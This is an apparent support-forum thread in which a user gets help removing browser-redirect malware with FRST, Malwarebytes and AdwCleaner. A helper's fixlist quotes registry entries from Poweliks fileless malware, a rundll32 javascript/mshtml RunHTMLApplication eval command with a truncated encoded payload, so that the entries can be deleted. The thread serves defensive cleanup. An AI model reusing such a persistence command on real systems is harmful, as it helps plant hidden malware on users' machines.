Hi-
Over the last several days, I see frequent Avast alerts that go.wvydeo.com/resultsa/?… has been detected/blocked from iexoplore,exe.
I searched on the topic and followed the information.
I could not find a program of any such name in my program listing to un-install.
I could not find a program of any such name in my explorer add-ins.
Please advise what logs and/or other information is required for assistance in removing this malware.
Regards,
Dave
Thanks Eddy.
When I try to download the Malwarebytes software, I get a popup windows that says my current security settings will not allow this file to be downloaded.
I have not previously seen this alert when I tried to download/save a file. Can you tell me how to bypass this? I am reluctant to turn off AVAST if I have an infection. It seems like opening the barn doors. Can I try to download onto a thumbdrive from a different computer and copy the file over to the machine in question?
Regards,
Dave
Skip malwarebytes and attach the Farbar logs.
Same message for Farbar, “…current security settings do not allow this file to be downloaded…”
??
Can I try to download onto a thumbdrive from a different computer and copy the file over to the machine in question?Yes....
When it rains it pours… I had unexpected connectivity issues with all of my computers.
I downloaded FRST to a thumb drive and copied it to the primary machine. I have attached the FRST and ADDITIONS txt files.
Please advise if I should do same for MBAM, as well as next steps.
Thanks,
Dave
I neglected to mention that when I ran the FRST, a message window popped up a few times that “Windows Powershell has stopped working”. The scan appeared to stop for a few moments, then resumed. I ignored the error until the end of the scan, then acknowledged it. Not sure if this was expected or not?
-Dave
One last bit of data.
I was able to install and execute MBAM.
68 non-Malware events were detected and recommended action was ‘Quarantine’.
I allowed the recommended action to occur.
The log is attached.
Please advise what steps I should take next, and do I just leave the quarantined items where thy are?
Thanks and regards,
Dave
Did you run malwarebytes before or after FRST ?
MBAM should be run before FRST so that the diagnostic logs show whats left after MBAM have quarantined…
No, sorry.
I could not download any of the scanners on the primary machine due to 'Security Settings ‘’ (?).
In one of the first replies, ‘Eddy’ said to skip MBAM and proceed with FRST, so that is what I did.
Advise if I need to start over, and please verify the sequence.
-Dave
Since you had MBAM removing things, we will need fresh logs from Farbar.
And please do only as we say, don’t change anything on the system.
OK. Fresh files from Farbar. Note: no 'Powershell stopped working ’ errors popped up during this most recent scan.
Thanks for your patience.
-Dave
To all,
Any updates with regards to anything I should do?
Is there any other log that I need to post?
Thanks and regards,
Dave
Hi, DavKar. The warning about file downloads comes from Internet Explorer. If you open “Internet Options” and then click the “Security” tab, you can enable files to be downloaded.
On the Security tab, click the button labeled “Custom level…”
You should be presented with a long list of settings. If you scroll down, you will eventually see a
setting for “Downloads”. There will be a sub-setting for “File Download” and another for “Font Download”.
Click “Enable” for the File Download setting which I suspect is currently “Disable”-d. Accept the setting change for the Internet zone and you will be able to download files. Avast should still be checking downloads for badness, so if you download something else undesirable, you will hopefully get notified.
In my case, when I reboot my computer, this value is always reset to “Disable”. I have been struggling with this for some time, but I did not attribute it to Malware until the last few days, when I began to experience problems with the go.wvydeo issue.
I’m following this post with interest to see if there is a cure on the horizon.
Best Regards.
Hi msfica,
Thanks for confirming what I read elsewhere. I have not changed the setting just yet - but I checked and it was set to ‘Disable’.
Especially in the evenings, AVAST displays numerous alerts of blocked attempts via IEXPLORE every minute or so. When I started this post for assistance, it was the go.wyvdeo. The last couple of days, I see cdn1.moviereviews, cdn3.moviereviews, gamingprecision.api, s.vb3k.com/crossdomain, and a few URL-based, such as 199.115.116.235/redirect_js_new.php.
I do not know enough to understand what may be ok or a false positive, and what is ‘bad’. I am grateful that AVAST has blocked these attempts. I do not know if anything can be done about attempted attacks. MBAM did find some non-malware issues. Hopefully when the Forum backlog clears, someone can provide some insight.
This exactly describes the symptoms I see. Would guess the problem is with Avast and not any individual computer
To any/all Forum Specialists -
Is there anything else I need to provide in order to gain assistance? Any other logs?
I am unsure as to the rules of the forum, is assistance based upon FIFO or severity or something else?
I continue to receive alerts regarding the blocking of several URLs that I see other posters have reported.
Thanks in advance,
DavKar
Hi you appear to have slipped through the net … Sorry 
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint: HKU\S-1-5-21-161080376-3053031705-4070085631-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks! Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File CustomCLSID: HKU\S-1-5-21-161080376-3053031705-4070085631-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks? C:\Users\Public\dcmsvcsetup.exe C:\Users\Public\invokesi.exe EmptyTemp: CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated please post that
THEN
Please download AdwCleaner by Xplode onto your desktop.
[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan.
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok.
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S1].txt as well.
Hi Essexboy-
Thanks for the response.
FRST has been running about an hour. It has been on the 'Deleting C:\Users\namehere\AppData\Local \Temp for a long time. The progress bar is still moving, but I am not sure if there is any hard drive activity.
Is this normal?
Also, when the FRST scan is complete and I have posted the log, can I proceed with AdwCleaner without waiting for a review of the FRST log?
Note, I am sending this from another machine. I did not want to interrupt the one undergoing the scan/fix from FRST.
Regards,
DavKar